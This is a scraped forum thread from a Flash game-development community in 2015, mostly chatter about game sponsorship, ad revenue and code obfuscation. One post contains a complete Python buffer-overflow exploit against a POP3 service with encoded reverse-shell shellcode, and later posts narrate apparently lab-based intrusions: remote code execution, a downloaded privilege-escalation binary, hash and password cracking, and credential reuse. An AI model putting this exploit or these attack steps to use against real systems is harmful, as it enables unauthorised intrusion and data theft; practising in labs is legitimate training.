00:00
00:00
Newgrounds Background Image Theme
Upgrade Your Account!

HO HO HOPE you become a Newgrounds Supporter this year!

We're working hard to give you the best site possible, but we have bills to pay and community support is vital to keep things going and growing. Thank you for considering!

Become a Supporter so NG can see another Christmas!

The Flash 'Reg' Lounge

3,085,236 Views | 60,186 Replies
New Topic Respond to this Topic

Response to The Flash 'Reg' Lounge 2015-05-25 10:46:14


At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!

Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.

Sounds like you need to tone the volume down lol.

Response to The Flash 'Reg' Lounge 2015-05-25 11:03:43


At 5/25/15 10:46 AM, MSGhero wrote:
At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!

Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.
Sounds like you need to tone the volume down lol.

Awww.... I love it though! It happens at the exact moment where the loading doors open to reveal a gate, and is totally Hollywoody... It even matches the Beethoven in the background!

Response to The Flash 'Reg' Lounge 2015-05-25 11:19:33


You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)

I'll be very happy to put up huge Tankman posters on the loading screen (which appears whenever the player changes location), and I'm working on adding medals.

Response to The Flash 'Reg' Lounge 2015-05-25 11:49:24


At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)

I think you still get preroll and page ads.

Response to The Flash 'Reg' Lounge 2015-05-25 12:10:20


At 5/25/15 11:49 AM, MSGhero wrote:
At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?

(Flashads don't work in the game, obviously...)
I think you still get preroll and page ads.

They seem to be much less effective than in-game adverts though...

Since you have had games frontpaged before, do you think that is the case?

Response to The Flash 'Reg' Lounge 2015-05-25 14:57:55


#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) overflow = "\x90" * 2606 # Create the buffer overflow EIP = "\x8F\x35\x4A\x5F" # JMP ESP in SLMFC.dll (x86, little endian) swap = "\x90" * 16 # Stack space for decoding shell = ("\xdd\xc0\xb8\x6f\x1b\x9d\x92\xd9\x74\x24\xf4\x5a\x2b\xc9" + "\xb1\x4f\x31\x42\x19\x83\xea\xfc\x03\x42\x15\x8d\xee\x61" + "\x7a\xd8\x11\x9a\x7b\xba\x98\x7f\x4a\xe8\xff\xf4\xff\x3c" + "\x8b\x59\x0c\xb7\xd9\x49\x87\xb5\xf5\x7e\x20\x73\x20\xb0" + "\xb1\xb2\xec\x1e\x71\xd5\x90\x5c\xa6\x35\xa8\xae\xbb\x34" + "\xed\xd3\x34\x64\xa6\x98\xe7\x98\xc3\xdd\x3b\x99\x03\x6a" + "\x03\xe1\x26\xad\xf0\x5b\x28\xfe\xa9\xd0\x62\xe6\xc2\xbe" + "\x52\x17\x06\xdd\xaf\x5e\x23\x15\x5b\x61\xe5\x64\xa4\x53" + "\xc9\x2a\x9b\x5b\xc4\x33\xdb\x5c\x37\x46\x17\x9f\xca\x50" + "\xec\xdd\x10\xd5\xf1\x46\xd2\x4d\xd2\x77\x37\x0b\x91\x74" + "\xfc\x58\xfd\x98\x03\x8d\x75\xa4\x88\x30\x5a\x2c\xca\x16" + "\x7e\x74\x88\x37\x27\xd0\x7f\x48\x37\xbc\x20\xec\x33\x2f" + "\x34\x96\x19\x38\xf9\xa4\xa1\xb8\x95\xbf\xd2\x8a\x3a\x6b" + "\x7d\xa7\xb3\xb5\x7a\xc8\xe9\x01\x14\x37\x12\x71\x3c\xfc" + "\x46\x21\x56\xd5\xe6\xaa\xa6\xda\x32\x7c\xf7\x74\xed\x3c" + "\xa7\x34\x5d\xd4\xad\xba\x82\xc4\xcd\x10\xb5\xc3\x5a\x5b" + "\x6e\xc5\x47\x33\x6d\xd9\x76\x7f\xf8\x3f\x12\x6f\xad\xe8" + "\x8b\x16\xf4\x62\x2d\xd6\x22\xe2\xce\x45\xa9\xf2\x99\x75" + "\x66\xa5\xce\x48\x7f\x23\xe3\xf3\x29\x51\xfe\x62\x11\xd1" + "\x25\x57\x9c\xd8\xa8\xe3\xba\xca\x74\xeb\x86\xbe\x28\xba" + "\x50\x68\x8f\x14\x13\xc2\x59\xca\xfd\x82\x1c\x20\x3e\xd4" + "\x20\x6d\xc8\x38\x90\xd8\x8d\x47\x1d\x8d\x19\x30\x43\x2d" + "\xe5\xeb\xc7\x5d\xac\xb1\x6e\xf6\x69\x20\x33\x9b\x89\x9f" + "\x70\xa2\x09\x15\x09\x51\x11\x5c\x0c\x1d\x95\x8d\x7c\x0e" + "\x70\xb1\xd3\x2f\x51") # msfpayload windows/shell_reverse_tcp LHOST=192.168.14.221 LPORT=443 R | msfencode -b "\x00\x0a\x0d" -e x86/shikata_ga_nai padding = "\x90" * (3500 - 2606 - 4 - 16 - 341) # Stack padding, 3500 bytes total - buffer overflow - EIP - swap space - shell payload try: print "\nSending buffer.." s.connect(("192.168.15.70", 110)) data = s.recv(1024) s.send("USER username\r\n") data = s.recv(1024) s.send("PASS " + overflow + EIP + swap + shell + padding + "\r\n") print "Done!" except: print "Could not connect!"

I rode a buffer overflow into a reverse shell with python, I feel kinda badass :D


Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-05-25 15:42:16 (edited 2015-05-25 15:49:45)


At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?

At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.

Response to The Flash 'Reg' Lounge 2015-05-25 21:21:06


At 5/25/15 03:42 PM, MSGhero wrote:
At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?
At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.

Ah, I see. They're not so bad then.

Also, I think I'm gonna put up links to my userpage and gain a little from that.

By the way, do you think I should obfuscate the code before I publish?

I'm not sure why anyone would steal my code though. Some of the code I added late in the development process is pretty spaghetti 'cos I know I'll rewrite the engine if I make a sequel.

Response to The Flash 'Reg' Lounge 2015-05-25 21:24:43


At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?

I'm not sure how js works, but it's not worth it for flash. No one really cares about your code. I guess it wouldn't hurt. Haxe's output is a terrible thing to look through on any platform... people who encounter obfuscated code would probably quit after 45 seconds.

Response to The Flash 'Reg' Lounge 2015-05-26 04:30:33


Security through obscurity is not security at all.


Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-05-26 08:14:37


At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?

Yes. Minify it, too.

At 5/26/15 04:30 AM, egg82 wrote: Security through obscurity is not security at all.

Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.

It's your best (and as far as I can think, only) for client side JavaScript.

Response to The Flash 'Reg' Lounge 2015-05-26 09:28:19 (edited 2015-05-26 09:28:55)


Okay... If Sam says to do it, then I'll do it.

Of course I'm going to minify! I have to make up for that embarrassing code copy-pasting that I don't want anyone to know about.

Speaking of which, I'll have to fix two minor bugs, add in volume control, add the Tankman posters anyway, make fancy scrollbars and possible a fancy cursor, test the remaining medals, and I'm all set. Probably.

What do you think about the icon?

Edit: Wow, I can edit now! This is such a touching moment.

Response to The Flash 'Reg' Lounge 2015-05-27 01:13:39


At 5/26/15 08:14 AM, Sam wrote: Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.

It's your best (and as far as I can think, only) for client side JavaScript.

Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)

If you want to screw with JS, there's easier ways as well.

Obfuscation offers a weak solution to a (virtually) nonexistent problem.


Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-05-27 07:19:40


At 5/27/15 01:13 AM, egg82 wrote: Obfuscation offers a weak solution to a (virtually) nonexistent problem.

It takes a grand total of 30 seconds to paste your code into an obfuscator. The trade off is worth it, in almost every case. Out of interest, I looked up a "deobfuscter", ripped their source, obfuscated it, and then used their tool to deobfuscate:

Original Source
Obfuscated -> Deobfuscated

I realise some may be better than others and the method of obfuscation affects the output, but I certainly wouldn't want to trawl through that code to find something. It at least deters a group of people from having access to your source code in a readable and usable format.

Basically, I see no reason not to.

Response to The Flash 'Reg' Lounge 2015-05-27 08:42:42


At 5/27/15 01:13 AM, egg82 wrote: Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it

Actually, I'm 17 now and will be 18 in a few months. I've grown :P

unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)

Why would anyone do that in JS?

Response to The Flash 'Reg' Lounge 2015-05-29 00:55:59


At 5/27/15 07:19 AM, Sam wrote: Original Source
Obfuscated -> Deobfuscated

You forgot the unescape option, which turns the top array of hex values into this:

var _0xc5a6 = ["", "space_after_anon_function", "jslint_happy", "braces_on_own_line", "expand", "collapse", "brace_style", "indent_size", "indent_char", " ", "preserve_newlines", "undefined", "max_preserve_newlines", "keep_array_indentation", "space_before_conditional", "indent_case", "length", "pop", "\x0A", "\x0D", "replace", "indexOf", "substring", "push", "eat_next_space", "mode", "if_line", "indentation_level", "var_line", "var_line_reindented", "case_body", "TK_COMMENT", "BLOCK", "[EXPRESSION]", "[INDENTED-EXPRESSION]", "(EXPRESSION)", "(FOR-EXPRESSION)", "(COND-EXPRESSION)", "DO_BLOCK", "previous_mode", "charAt", "case", "return", "do", "if", "throw", "else", "TK_EOF", "\x09", "indentation_baseline", "match", "-", "+", "TK_WORD", "in", "TK_OPERATOR", "TK_EQUALS", "var", "(", "[", "TK_START_EXPR", ")", "]", "TK_END_EXPR", "{", "TK_START_BLOCK", "}", "TK_END_BLOCK", ";", "TK_SEMICOLON", "/", "*", "/*", "*/", "TK_INLINE_COMMENT", "TK_BLOCK_COMMENT", "\'", "\"", "\\", "TK_STRING", "#", "!", "=", "[]", "{}", "<", "<!--", "in_html_comment", "-->", "TK_UNKNOWN", "split", "\x0A\x0D\x09 ", "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$", "0123456789", "+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! !! , : ? ^ ^= |= ::", ",", "continue,try,throw,return,var,if,switch,case,default,for,while,break,function", "for", "while", ".", "function", "typeof", "catch", "expand-strict", "default", "in_case_statement", ":", "in_case", "NONE", "toLowerCase", "finally", "NEWLINE", "end-expand", "SPACE", "get", "set", "new", "var_line_tainted", "OBJECT", "::", "--", "++", "ternary_depth", "?", "slice", "join", "js_beautify", "value", "text", "getElementById", "eval", "write", "writeln", "createPopup", "createElement", "Syntax Error:\x0A", "message", "alert", "Paste code here...", "script"];

You can then make a quick script that gets the values from that array and puts them back into whatever variables are using them. Then if you want to you can modify the function variables to be just x2, x3, etc. instead of _0xeed0x2, _0xeed0x3, etc. It'll be much easier to read, then.
Again, assuming you want to put the effort into it. If you don't, then you didn't really want to do it in the first place.

True, though. I suppose if it only takes a minute then go for it. Just don't loose your source code or you'll get to go back through your obfuscated AND decompiled code.


Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-01 03:10:53


Phoenix down!

Web fuzzer got robots.txt
Manually opened robots.txt to discover hidden /internal directory
View->Source to discover web page is a custom front-end for a system called "Advanced Comment System"
Google search revealed remote code execution exploit
Got PHP shell with apache permissions
uname showed kernel version compatible with 2009-2692 local privilege escalation exploit and fstab showed executable /tmp directory
compiled c executable on attacking machine, hosted on attacking http server, and wget to /tmp
executed, root acquired

Ka-boom.

The programmer in me is cringing at all the code I smashed into 8 bytes of memory

The Flash 'Reg' Lounge


Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-04 18:54:47


At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency

The hell did I just read.. ?


Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-07 05:25:10


At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency

That's a... rather elaborate joke.

Response to The Flash 'Reg' Lounge 2015-06-07 05:56:20


Response to The Flash 'Reg' Lounge 2015-06-07 16:20:05


At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency

Wasn't this joke in a film?

Response to The Flash 'Reg' Lounge 2015-06-08 02:21:55


At 6/7/15 04:20 PM, Sam wrote: Wasn't this joke in a film?

"Zack and Miri Make a Porno" I think
Same movie that had the "Double-Dutch Rudder"?

Don't ask me how I know this

Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-08 02:48:51


At 6/7/15 04:20 PM, Sam wrote:
At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency
Wasn't this joke in a film?

It was from the finale of the first season of Silicon Valley.


BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-11 18:00:34


Another one bites the dust. Alice is mine.
Simple buffer overflow from CVE-2003-0352. I should have seen that coming, I spent way too much time dinking around with the open terminal service port.

I did find a password-protected "bank-account.zip" on the C drive while I was looking for my "proof.txt" file. I downloaded that and I'll take a closer look at it after I decrypt the NT password hashes on the system.

Decrypted NTLM via online resource.
Not the password for the zip, though. Looks like I'll need to try to pop it open.

Broken password via my 980.
Yeah, should've seen that one coming as well. I swear I tried that one earlier, though.

Oh, what's this?
Where's that machine named "bob" again? I've got an idea of what that password might be.


Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-13 04:48:46


Bob, you're a giant pain in my ass.
Spent almost 12 hours attacking this one machine. I got in, but who knew privilege escalation on an XP machine with SP1 on it would be such a massive pain. Plenty of "local root" exploits for SP2 or 3, and I even found a service execution exploit that let me run things as SYSTEM/LocalService but every time I get a meterpreter running on that it dies in a few seconds.

I feel like the service I'm replacing is restarting because it's not a valid service executable.

Ughhh....

Also, the hell am I doing with that password I found on Alice? Should I log into the MASTER system with it?

Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-13 15:40:29


BOB, WHY DO YOU HATE EVERY FIBER OF MY BEING
AAAAAAAAAAAAAAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH

New target. Fuck it, bob can have his stupid computer

Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-18 04:29:13


https://egg82.ninja/
Any thoughts?
Not quite done yet. It's all custom written. I could have just used Wordpress, but meh.

Also I has PGP key. I feel special now :3

Programming stuffs (tutorials and extras)

PM me (instead of MintPaw) if you're confuzzled.

thank Skaren for the sig :P

BBS Signature

Response to The Flash 'Reg' Lounge 2015-06-20 04:31:40


At 6/18/15 04:29 AM, egg82 wrote: https://egg82.ninja/
Any thoughts?
Not quite done yet. It's all custom written. I could have just used Wordpress, but meh.

Also I has PGP key. I feel special now :3

Cool! A .ninja TLD? :O

Response to The Flash 'Reg' Lounge 2015-06-21 16:19:59 (edited 2015-06-21 16:20:29)


At 6/21/15 03:42 PM, CodeCrunch wrote: What do when openfl can't tell me where in my code there's a problem and points to itself instead?

What target are you exporting to?

My first guess is the last line in the screencap, "invalid *". This happens to me in neko when I don't initialize all my numbers, assuming they'll default to 0 like in flash. It's either null or undefined or NaN or something, and you can't multiply those, and it crashes.

Second guess is update openfl and lime to the latest master versions and try again. If you just did, maybe reinstall them bc sometimes they'll release a fix without telling anyone or updating the version number.

Response to The Flash 'Reg' Lounge 2015-07-01 13:50:00


god why do games take so long to make when you actually want to charge money for them

anyway ITS HAPPENING
https://www.youtube.com/watch?v=pNafa98gXO4